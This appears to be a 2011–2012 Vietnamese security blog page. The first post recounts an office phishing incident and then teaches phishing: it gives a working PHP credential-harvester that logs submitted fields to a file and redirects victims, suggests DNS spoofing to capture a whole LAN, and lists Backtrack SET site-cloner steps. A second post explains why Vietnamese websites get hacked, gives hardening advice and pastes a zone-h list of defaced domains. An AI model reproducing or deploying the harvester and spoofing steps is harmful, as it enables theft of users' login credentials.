Tổng lượt truy cập

Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

Saturday, April 14, 2012

Phishing attack

Hi all,
Hôm nay mình kể lại câu chuyện lúc ngồi trong cơ quan, đang ngồi tự nhiên có một nick rất lạ gửi cho tôi một link http://goo.gl/qih4 và mời gọi kích vào (ái rà anh nào định hit mình đây, Find sơ qua tôi đã biết http://goo.gl là tính năng của bạn google cho phép tạo một url ngắn, giúp cho người dùng dễ nhớ và đây cũng là cũng là tiện ích cho các nhà cung cấp quảng bá sản của họ tới khách hàng, url được tạo thời gian thực chúng ta đánh một IP bất kỳ, hoặc tên miền bất kỳ vào thì đầu ra của trang là môt url ngắn : goo.gl/link .
you send me: http://goo.gl/qih4 nhân tiện lúc đang test về virus vậy nên okie cứ kích vào thôi. Quả nhiên kích vào link trên trên url hiện ngay ip chú 10.36.x.x . He he thì ra là một chú trong LAN đang muốn hit mình, cái page home là mail của cơ quan mình. He, đây là trò phishing mà cách đây 2 năm tôi đã từng test (vì ip mail của cơ quan tôi ko phải địa chỉ mà tôi đang thấy 10.36.x.x. Nhưng không sao để xem cậu ta sẽ thực thi những gì vì tiện đang chạy tool show các process trên máy, tôi liền đánh user, pass tất nhiên là đánh bừa rồi :). Tôi biết ip của máy cậu ta rồi, vì tôi đã dùng một số tool để main in the middle cậu ta, quả nhiên cậu ta đang vào mail nội bộ để check user xem user và pass của tôi đánh có đúng không. Hi và tôi đã lại chỗ cậu ta và nhận được mộ phản ứng cười và nói, em đang test một tool demo trên Backtrack'. Tôi đồng ý nhưng  theo chính sách An toàn thông tin thì ta bị phạm khi thực hiện hành động này trên hệ thống của tổ chức tôi. Hi

    Đây chỉ câu chuyện nhỏ, quan trọng bài này tôi muốn giúp các bạn hiểu được bản chất phishing là gì và các cách thường sử dụng.
- Phishing: 'Câu cá' bản chất của nó là tạo ra hệ thống giống giả có giao diện giống như thật nhằm đánh lừa người sử dụng vào, và lúc này hacker có thể lấy toàn bộ thông tin của người dùng khi vào trang giả mạo này.
- Cách cách phishing:

     +Tạo một face giao diện như trang thật vd: mail.google.com,forum/login.com.vn (tạo face quá  đơn giản rồi ) lấy mã nguồn của trang đấy chỉnh sửa thành của mình, bạn sử code có đọan "get" thành "post" và action ="tên của file sau khi đăng nhập vd: fake.php"

code facke.php

<?php
header("Location: echttp://hummer.xxx:8000/calendar/login.php?cd=1&domain=default");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
//http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default là địa chỉ thật 
------
passwords.txt view pass.
xong , nhưng lúc này bạn gửi link chính là địa chỉ của máy mình hoặc chuyển sang tên miền dùng  http://goo.gl, hoặc tên miền local của mình. Nhưng có cách nào để dùng chính tên miền thật ?

    + Advance : sử dụng số số phương pháp DNS Spoofing Attack http://mysunitsecurity.blogspot.com/2010/11/dns-spoofing-attack.html để reject tên miền đảm bảo rằng tất cả người dùng trong LAN http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default đều chuyển sang đại chỉ ip của máy của bạn.(Ha.ha thú vị lắm đấy). :)

Nếu bạn đã từng sử dụng backtrack thì việc thực hiện phishing dễ hơn vì sử dụng sản OS và tool có sẵn :
 cd pentest/exploit/set
   ./set ->
   -> web attack vectors
    -> tabnabbing attack method
    -> site cloner  "tape url site wam phishing"
    -> enter.
    send ip victim :)
- Phòng tránh: Đừng chết vì thiết hiểu biết nhé các Men :)
------------------------

Monday, December 5, 2011

Friday, November 18, 2011

Nguyên nhân website Việt Nam bị Hack


Hi All,

Gần đây như các bạn đã nghe trên báo đài về website VN bị tấn công rất nhiều. Vậy nguyên nhân do đâu ? . Bản thân tôi cũng bức xúc mỗi lần truy cập website mà không truy cập được hoặc site bị attacker chiếm quyền deface….Số lương web bị hack ngày càng nhiều và mức độ ngày càng nguy hiểm và tinh vi hơn.

Ảnh hưởng khi site bị tấn công:
-          Mất uy tín về tổ chức, khi site bị tấn công tất cả điều khiển đều thuộc Attacker, Attacker có thể deface site, hoặc dùng site của tổ chức tuyên truyền nội dung không đúng sự thật.
-          Ảnh hưởng về kinh doanh làm thiệt hại tài chính, khi khách hàng không truy cập được website của tổ chức để cập nhật sản phẩm , thông tin sản phẩm... Đặc biệt các website liên quan đến tài chính.
-          Ảnh hưởng chiến lược business, khi khách hàng cũ không truy cập được site sẽ chán nản, dẫn đến chán nản có thể chuyển sang đối tác khác, đối khách hàng mới có thể không có thông tin trên internet dẫn đến không thể tiếp cận khách hàng..
-         

Nguyên nhân:

Mysun đã thực hiện phân tích những website bị hack này thì nhận thấy. Đa số site bị hack là site chưa thực hiện cập nhật bản vá OS, APP định kỳ, thâm trí các cấu hình bảo mật mức cơ bản cũng đều chưa có, các lỗi cổ điển như SQL, XSS vẫn tồn tại một cách ngây thơ và đa số site đều được lấy code từ mã nguồn mở như Jomla, Wordpress về chỉnh sửa mà chưa thực hiện hardening cho chúng.  
-          Tổ chức chưa chú trọng đâu tư về bảo mật, mặc dù khi xảy ra sự cố bảo mật có thể ảnh hưởng trực tiếp đến lợi nhuận cũng như chiến lược kinh doanh của tổ chức.
-          Chưa có bộ phận chuyên trách bảo mật hoặc một admin có kiến thức về bảo mật.

Khắc phục:
-          Vần đề bảo mật ảnh hưởng trực tiếp đến lợi nhuận cũng như chiến lược của các tổ chức nên các tổ chức nên chú trọng bảo mật (Không nên mất bò mới lo làm chuồng) . Bảo mật bao gồm cả hệ thống Mạng, hệ thống, ứng dụng chứ không riêng gì website. Một ngày đẹp trời không chỉ website của bạn chết , mà cả hệ thống máy chủ hệ thống mạng khác bị người hoạt động. Bạn xử lý thế nào?
-          Nên có bộ phận chuyên trách hoặc một người có kiến thức về bảo mật để thực hiện dò quét, phát hiện lỗ hổng thực hiện fix lỗ hổng.
-          Các  website nếu sử dụng code mã nguồn mở nên thực hiện hardening trước khi đưa vào sử dụng.
-          Cần thực hiện test bảo mật trước khi đưa site lên live.

ð   Nếu bạn muốn test thử site của bạn tôi có thể giúp bạn

trong" zon-h"

-
Date Notifier H M R L Domain OS View
2011/11/17 E1nzte1N H M
Viet Nam
www.bptech.com.vn Linux mirror
2011/11/16 Ayyıldız Tim H
R Viet Nam
www.dncot.edu.vn Win 2003 mirror
2011/11/16 1923Turk


Viet Nam
thanhxuan.edu.vn/demo-nitro/ni... Linux mirror
2011/11/16 thecybernuxbie


Viet Nam
hoanganhphat.com.vn/tmp/bajing... Linux mirror
2011/11/16 C-FRoO


Viet Nam
vnptbacgiang.com.vn/index.html Win 2003 mirror
2011/11/15 Team DXP HaCkErS

R Viet Nam
www.cuocsongviet.vn/index.html Win 2003 mirror
2011/11/15 HEXB00T3R


Viet Nam vpdt.vinhcity.gov.vn/index.htm Win 2003 mirror
2011/11/15 aBu.HaliL501 H M
Viet Nam
qac.vn Linux mirror
2011/11/15 aBu.HaliL501 H M
Viet Nam
binhminhpc.vn Linux mirror
2011/11/15 t3ll0
M R Viet Nam
diendan.doanhnhansaigon.vn/rea... Win 2003 mirror
2011/11/15 t3ll0
M
Viet Nam
luongvancan.doanhnhansaigon.vn... Win 2003 mirror
2011/11/15 Anarchy Cr3w

R Viet Nam
epaper.doanhnhansaigon.vn/inde... Win 2003 mirror
2011/11/14 1923Turk H M
United States
kimi.edu.vn Linux mirror
2011/11/14 kosovali16
M
Viet Nam
cleanstart.dermalogica.com.vn/... Win 2003 mirror
2011/11/14 kosovali16
M
Viet Nam
lichcupdien.vn/kosovali.aspx Win 2003 mirror
2011/11/14 kosovali16


Viet Nam
globalnsc.com.vn/pages/kosoval... Win 2003 mirror
2011/11/09 1923Turk H

Viet Nam
hebu.vn Linux mirror
2011/11/09 1923Turk H M
United States
clbgame.vn Linux mirror
2011/11/09 1923Turk H

Viet Nam
thucphamcaocap.vn Linux mirror
2011/11/09 CyberBellona
M
Viet Nam
buy.xinhxinh.com.vn/cb.html Win 2003 mirror
2011/11/09 CyberBellona


Viet Nam
support.xinhxinh.com.vn/cb.html Win 2003 mirror
2011/11/09 Jo & Tu Team
M
Viet Nam
tapchi.vnu.edu.vn/jo.html Win 2003 mirror
2011/11/09 1923Turk
M R Viet Nam
suctre.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 Hmei7


Viet Nam
js.vnu.edu.vn/indonesia.txt Win 2003 mirror
2011/11/08 SecurityBus
M
Viet Nam
www.ooh.datvietvac.vn/images/ Linux mirr
2011/11/08 SecurityBus
M
Viet Nam
www.ooh.datvietvac.vn/images/ Linux mirror
2011/11/08 SecurityBus H

Viet Nam
minhlonghung.com.vn Linux mirror
2011/11/08 1923Turk

R Singapore
sunset.com.vn/yunus.html Linux mirror
2011/11/08 1923Turk
M R Viet Nam
lic.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 1923Turk
M
Viet Nam
khtc.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 1923Turk
M R Viet Nam
tapchiktdn.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 1923Turk
M
Viet Nam
csquangninh.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 1923Turk
M R Viet Nam
qtkd.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/08 1923Turk

R Viet Nam
hanquoc.ftu.edu.vn/yunus.html Win 2003 mirror
2011/11/07 juan666 H

Viet Nam
infoway.com.vn Win 2003 mirror
2011/11/07 iskeltan H

Viet Nam
bitky.name.vn Linux mirror
2011/11/07 1923Turk
M
Viet Nam
tuva.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
huongdanso.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
chinatowncafe.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
demo3.cotmoc.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
amthucmobi.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
forum.cotmoc.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
e-may.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk


Viet Nam
mhbrs.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
www.chongthambasf.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
ducphuc.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
di10.com.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
sonatapaint.com.vn/yunus.html Win 2003 mirror
2011/11/07 1923Turk
M
Viet Nam
gmtravel.vn/yunus.html Win 2003 mirror